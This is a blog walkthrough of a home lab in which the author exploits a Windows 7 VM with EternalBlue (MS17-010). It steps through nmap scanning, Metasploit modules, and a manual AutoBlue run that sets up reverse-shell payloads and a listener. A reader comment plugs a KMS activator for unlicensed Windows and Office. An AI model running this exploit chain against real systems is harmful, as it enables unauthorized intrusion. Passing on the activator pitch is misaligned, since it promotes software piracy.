DEV Community

Cover image for Blue Windows 7 Walkthrough
Babs
Babs

Posted on

Blue Windows 7 Walkthrough

Ever wondered how far you can push a machine before it breaks? This walkthrough explores unconventional methods to interact with the Blue machine.

Image description

The password for the machine is:



user- Password123!

admin- Password456!


Enter fullscreen mode Exit fullscreen mode

The admin password is required to get the machine's IP address.

Using

ipconfig

with administrative login the IP address of the machine is shown. The image below shows mine.

Image description

On our kali terminal we run the ping command to verify if our machine is online and can communicate with our kali machine using the command:



ping 192.168.59.133


Enter fullscreen mode Exit fullscreen mode

NB- Make sure to change the IP address to your target's IP address

Image description

The packets received shows that the machine is online so we run NMAP scan to discover which ports are open using the command:



nmap -p- -A 192.168.59.133


Enter fullscreen mode Exit fullscreen mode

Image description

From the image above port 445 is open and the highlighted part of the image shows that the windows 7 ultimate is SMB related which is known to be vulnerable, so we do a google search to search for "Windows 7 Ultimate 7601 Service Pack 1 exploit"

Image description
After much enumeration it seems the exploit for the windows 7 is popularly known as "MS17-010 EternalBlue"

So we turn on metasploit using the command:



msfconsole


Enter fullscreen mode Exit fullscreen mode

And then we input the command:



search eternalblue


Enter fullscreen mode Exit fullscreen mode

You can also try using:



search MS17-010


Enter fullscreen mode Exit fullscreen mode

Image description

We need to first confirm if the machine is vulnerable to the exploit and there are two ways we can do this using either auxiliary scanner or the exploit itself.

Using the auxiliary scanner:
From the result gotten after searching for the exploit using metasploit the scanner to be used for this is "auxiliary/scanner/smb/smb_ms17_010" which is Number 24 for me (yours might be different).

So input the command:



 use 24 


Enter fullscreen mode Exit fullscreen mode

NB- use whatever number your scanner shows

Image description

To view details input the command:



options


Enter fullscreen mode Exit fullscreen mode

Now set rhosts to your target IP address:



set rhosts 192.168.59.133


Enter fullscreen mode Exit fullscreen mode

Input the command to confirm details:



options


Enter fullscreen mode Exit fullscreen mode

Image description

Image description
Now input the command:



run


Enter fullscreen mode Exit fullscreen mode

Image description

It shows us that the host is likely vulnerable to the exploit chosen.

Now we search the exploit again using the command:



search eternalblue


Enter fullscreen mode Exit fullscreen mode

Image description

The option we want to use is the "exploit/windows/smb/ms17_010_eternalblue" which for me is option 0, so input the command:



use 0


Enter fullscreen mode Exit fullscreen mode

And then we input the command:



options


Enter fullscreen mode Exit fullscreen mode

Image description
Now we set our rhosts to the target's IP address using the command:



set rhosts 192.168.59.133


Enter fullscreen mode Exit fullscreen mode

and



options


Enter fullscreen mode Exit fullscreen mode

to confirm changes.

Image description

Now! Input the command:



check


Enter fullscreen mode Exit fullscreen mode

Image description
The image shows that the target is vulnerable (This is the second way to scan if the machine is vulnerable to the exploit)

Now to run the exploit, we input the command:



run


Enter fullscreen mode Exit fullscreen mode

OR



exploit


Enter fullscreen mode Exit fullscreen mode

Depending on how cool you want to feel(wink)

Image description
THE MACHINE HAS BEEN SUCCESSFULLY EXPLOITED.

MANUAL EXPLOITATION

We start by searching for "eternalblue github" because the exploit I want to use is on github.
From the search results choose the one from 3ndG4me github

Image description

Now on kali, move into the /opt/ folder using the command:



cd /opt/


Enter fullscreen mode Exit fullscreen mode

NB- The /opt folder in Kali Linux is for optional add-on software packages. This means it stores software that isn't part of the core Kali system itself.

On the github page, click on code and copy the https link

Image description

Now input the command:



git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git


Enter fullscreen mode Exit fullscreen mode

NB- for this exploit make sure you are using root user or you'd experience the error has seen below

Image description

Switch to root using:



sudo su root


Enter fullscreen mode Exit fullscreen mode

and then input your root password if it requests for it.

Now re-run the command:



git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git


Enter fullscreen mode Exit fullscreen mode

The command is now successful and an autoblue directory has been created.

Image description

Move into the autoblue directory using the command:



cd AutoBlue-MS17-010/


Enter fullscreen mode Exit fullscreen mode

Input the command:



pip install -r requirements.txt 


Enter fullscreen mode Exit fullscreen mode

Image description
Move into the shellcode directory using the command:



cd shellcode


Enter fullscreen mode Exit fullscreen mode

and then run shell prep using the command:



./shell_prep.sh 


Enter fullscreen mode Exit fullscreen mode

Enter y for the question.
Then enter your kali IP address(That is your local host known as lhost)
Enter a port number you know is free for x64, for me I'm using 9999

And enter another port number for x86, for me I'm using 2222

Image description
For the shell I want to use a regular cmd shell because I already used a meterpreter shell for the msfconsole exploit, so using either one will work, but I'm using the cmd

So input the command:



1


Enter fullscreen mode Exit fullscreen mode

And for the payload input the command:



0


Enter fullscreen mode Exit fullscreen mode

to select the staged payload.
(the staged or stageless payload should work but for me I'm using the staged)

Image description

Now that is done we need to go back and execute listener
We go back by inputting the command:



cd ..


Enter fullscreen mode Exit fullscreen mode

Now input the command:



./listener_prep.sh


Enter fullscreen mode Exit fullscreen mode

NB- The command above is running a listener for us in metasploit.

So now we fill the details as we filled them before by inputting the same details for the lhost,ports, regular cmd and staged payload.

Image description

Now all that's left is for us to run the exploit.
For that open a new tab by clicking on file and then new tab to open a new tab.

Image description

On the new tab, switch to root, move to /opt/ and then cd into autoblue directory

Image description

Now! Run the command:



python eternalblue_exploit7.py 192.168.59.133 shellcode/sc_all.bin


Enter fullscreen mode Exit fullscreen mode

NB- Change the IP address to your blue machine IP address.

The image below shows the blue machine before running the exploit:

Image description

The image below shows the blue machine after running the exploit:

Image description

The image below shows kali's output:

Image description

The exploit was successful and also ended up crashing the system.

This is a perfect example of why when running a penetration test, you need to keep the people or organisation informed before running an exploit because you could have tipped over an important machine that's being used.

SOME CHALLENGES YOU MIGHT FACE WHEN DOING THIS LAB EXPERIMENT

Image description

If your machine ends up showing up like it did in the image above, you will need to delete it and reinstall the machine.
Once you've done that, login with the administrator password and get your IP address and then log out and stay on the page as seen below:

Image description

Once your machines home page changes from the natural blue to black background then you will need to uninstall and re-install the machine.

Blue background like this signifies the machine is alive and will communicate well with your kali.

Image description

Black background like this indicates something has gone wrong, so make sure to re-install the machine.

Image description

GOODLUCK!

Top comments (2)

Collapse
 
alex_nechai_3ec06f97f8a11 profile image
Alian Duas • Edited

Hello there, thank you for such detailed information about Windows 7. I had a lot of difficulties with activating Windows and Microsoft Office and for a long time I did't understand how to do it quickly and inexpensively, but then I found kms office activator where I was able to activate free versions of Windows and Microsoft Office very quickly and easily.

Collapse
 
babsarena profile image
Babs

Glad you could figure that out